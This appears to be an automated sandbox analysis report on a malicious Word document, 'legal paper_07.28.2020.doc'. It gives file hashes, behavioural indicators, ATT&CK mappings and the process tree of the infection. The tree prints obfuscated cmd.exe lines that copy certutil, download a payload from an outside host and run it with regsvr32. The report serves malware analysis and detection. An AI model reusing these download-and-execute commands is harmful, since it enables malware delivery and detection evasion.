8d75e83e570e8faba7bfaf17b7d836d35681cd45e0bcf5366e29381fefb04dc1

General

Target

legal paper_07.28.2020.doc
Size

109KB
MD5

27e1c0980b1737357b041154ac43acd2
SHA1

686b652ec115e4ff259928b9b66cdbd4aaac7ce9
SHA256

8d75e83e570e8faba7bfaf17b7d836d35681cd45e0bcf5366e29381fefb04dc1
SHA512

f222fdf92eba821de1a8d6e809bc4846b5738b3195d7256f2214aaa3e479536804720befb8878318bc0462276b704a2f73a8b1a39aa1f4eb6c9e1dabcfe85195

Score

10^/10

discovery

Malware Config

Signatures

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1000	608	cmd.exe	WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1612	608	cmd.exe	WINWORD.EXE

Loads dropped DLL 2 IoCs

Processes:

cmd.exeregsvr32.exe

pid process

1612 cmd.exe
1576 regsvr32.exe
Executes dropped EXE 1 IoCs

Processes:

1.exe

pid process

1064 1.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

regsvr32.exe

pid process

1632 regsvr32.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

regsvr32.exe

pid process

1576 regsvr32.exe
1576 regsvr32.exe
Office loads VBA resources, possible macro or embedded object present
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

pid	process
1612	cmd.exe
1576	regsvr32.exe

pid	process
1064	1.exe

pid	process
1632	regsvr32.exe

pid	process
1576	regsvr32.exe
1576	regsvr32.exe

Suspicious use of SetWindowsHookEx 16 IoCs

Processes:

WINWORD.EXE

pid	process
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE
608	WINWORD.EXE

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

WINWORD.EXEcmd.exeregsvr32.exe

description	pid	process	target process
PID 608 wrote to memory of 1000	608	WINWORD.EXE	cmd.exe
PID 608 wrote to memory of 1000	608	WINWORD.EXE	cmd.exe
PID 608 wrote to memory of 1000	608	WINWORD.EXE	cmd.exe
PID 608 wrote to memory of 1612	608	WINWORD.EXE	cmd.exe
PID 608 wrote to memory of 1612	608	WINWORD.EXE	cmd.exe
PID 608 wrote to memory of 1612	608	WINWORD.EXE	cmd.exe
PID 1612 wrote to memory of 1064	1612	cmd.exe	1.exe
PID 1612 wrote to memory of 1064	1612	cmd.exe	1.exe
PID 1612 wrote to memory of 1064	1612	cmd.exe	1.exe
PID 1612 wrote to memory of 1632	1612	cmd.exe	regsvr32.exe
PID 1612 wrote to memory of 1632	1612	cmd.exe	regsvr32.exe
PID 1612 wrote to memory of 1632	1612	cmd.exe	regsvr32.exe
PID 1612 wrote to memory of 1632	1612	cmd.exe	regsvr32.exe
PID 1612 wrote to memory of 1632	1612	cmd.exe	regsvr32.exe
PID 1632 wrote to memory of 1576	1632	regsvr32.exe	regsvr32.exe
PID 1632 wrote to memory of 1576	1632	regsvr32.exe	regsvr32.exe
PID 1632 wrote to memory of 1576	1632	regsvr32.exe	regsvr32.exe
PID 1632 wrote to memory of 1576	1632	regsvr32.exe	regsvr32.exe
PID 1632 wrote to memory of 1576	1632	regsvr32.exe	regsvr32.exe
PID 1632 wrote to memory of 1576	1632	regsvr32.exe	regsvr32.exe
PID 1632 wrote to memory of 1576	1632	regsvr32.exe	regsvr32.exe

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

Processes:

cmd.exe

pid process

1612 cmd.exe

pid	process
1612	cmd.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

regsvr32.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	regsvr32.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

608 WINWORD.EXE

C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\legal paper_07.28.2020.doc"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Suspicious behavior: AddClipboardFormatListener
PID:608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
2⤵
- Process spawned unexpected child process
PID:1000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://apc846.com/bolb/jaent.php?l=liut2.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
- An obfuscated cmd.exe command-line is typically used to evade detection.
PID:1612

C:\ProgramData\1.exe
C:\ProgramData\1.exe /urlcache /f http://apc846.com/bolb/jaent.php?l=liut2.cab C:\ProgramData\1.tmp
3⤵
- Executes dropped EXE
PID:1064

C:\Windows\system32\regsvr32.exe
regsvr32 C:\ProgramData\1.tmp
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1632

C:\Windows\SysWOW64\regsvr32.exe
C:\ProgramData\1.tmp
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Modifies system certificate store
PID:1576

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

1

T1130

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1.exe

Download Submit
C:\ProgramData\1.tmp

Download Submit
\ProgramData\1.exe

Download Submit
\ProgramData\1.tmp

Download Submit
memory/1000-3-0x0000000000000000-mapping.dmp

Download
memory/1064-6-0x0000000000000000-mapping.dmp

Download
memory/1576-10-0x0000000000000000-mapping.dmp

Download
memory/1612-4-0x0000000000000000-mapping.dmp

Download
memory/1632-8-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads